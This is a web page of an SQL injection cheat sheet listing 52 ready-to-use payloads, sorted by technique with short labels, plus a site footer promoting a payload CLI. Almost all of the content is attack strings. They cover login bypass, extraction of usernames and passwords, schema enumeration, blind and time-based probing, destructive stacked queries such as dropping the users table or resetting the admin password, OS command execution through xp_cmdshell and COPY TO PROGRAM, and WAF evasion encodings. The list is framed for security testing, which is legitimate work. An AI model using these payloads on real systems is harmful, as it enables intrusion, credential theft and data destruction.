SQL Injection Cheat Sheet

SQL Injection payloads for testing authentication bypass, UNION-based, error-based, and blind injection. (52 payloads)

Authentication Bypass

(10)

' OR '1'='1

Classic OR bypass

' OR '1'='1'--

OR bypass with comment

' OR '1'='1'/*

OR bypass with block comment

admin'--

Comment out password check

' OR 1=1--

Numeric OR bypass

' OR 1=1#

MySQL hash comment bypass

') OR ('1'='1

Parenthesized OR bypass

') OR ('1'='1'--

Parenthesized with comment

' UNION SELECT 1,'admin','password'--

UNION login bypass

' OR ''='

Empty string comparison

UNION-Based

(10)

' UNION SELECT NULL--

Detect column count (1 col)Generic

' UNION SELECT NULL,NULL--

Detect column count (2 cols)Generic

' UNION SELECT NULL,NULL,NULL--

Detect column count (3 cols)Generic

' ORDER BY 1--

Column count via ORDER BYGeneric

' UNION SELECT username,password FROM users--

Extract credentialsGeneric

' UNION SELECT table_name,NULL FROM information_schema.tables--

List tablesMySQL/PostgreSQL

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

List columnsMySQL/PostgreSQL

' UNION SELECT @@version,NULL--

Get MySQL versionMySQL

' UNION SELECT version(),NULL--

Get PostgreSQL versionPostgreSQL

' UNION SELECT @@servername,NULL--

Get MSSQL server nameMSSQL

Error-Based

(6)

' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--

ExtractValue error leakMySQL

' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version()),0x7e),1)--

UpdateXML error leakMySQL

' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

Floor error leakMySQL

' AND 1=CONVERT(int,(SELECT @@version))--

CONVERT error leakMSSQL

' AND 1=CAST((SELECT version()) AS int)--

CAST error leakPostgreSQL

' || (SELECT '' FROM dual) || '

Oracle string concat testOracle

Blind (Boolean-Based)

(7)

' AND 1=1--

True condition test

' AND 1=2--

False condition test

' AND SUBSTRING(@@version,1,1)='5'--

Version fingerprintMySQL

' AND (SELECT COUNT(*) FROM users)>0--

Table existence check

' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>64--

Binary search on character

' AND LENGTH((SELECT database()))>5--

Database name lengthMySQL

' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--

Conditional error

Blind (Time-Based)

(7)

' AND SLEEP(5)--

5 second delayMySQL

'; WAITFOR DELAY '0:0:5'--

5 second delayMSSQL

' AND pg_sleep(5)--

5 second delayPostgreSQL

' AND IF(1=1,SLEEP(5),0)--

Conditional delayMySQL

'; IF (1=1) WAITFOR DELAY '0:0:5'--

Conditional delayMSSQL

' AND (CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--

Conditional delayPostgreSQL

' OR BENCHMARK(10000000,SHA1('test'))--

CPU benchmark delayMySQL

Stacked Queries

(5)

'; DROP TABLE users--

Drop table (destructive)

'; INSERT INTO users VALUES('hacker','hacked')--

Insert new record

'; UPDATE users SET password='hacked' WHERE username='admin'--

Modify admin password

'; EXEC xp_cmdshell('whoami')--

OS command executionMSSQL

'; COPY (SELECT '') TO PROGRAM 'id'--

OS command executionPostgreSQL

WAF Bypass

(7)

' /*!UNION*/ /*!SELECT*/ 1,2,3--

MySQL inline comment bypass

' %55NION %53ELECT 1,2,3--

URL encoded keywords

' uNiOn SeLeCt 1,2,3--

Alternating case bypass

' UNION%0ASELECT%0A1,2,3--

Newline bypass

' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--

Version-specific comment bypassMySQL

'/**/UNION/**/SELECT/**/1,2,3--

Comment as whitespace

' AND 1=(SELECT 1 FROM dual WHERE 1=1)--

Subquery instead of OROracle

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

SQL Injection NoSQL Injection

Related Cheat Sheets

XSS Cheat Sheet Command Injection Cheat Sheet

$loading...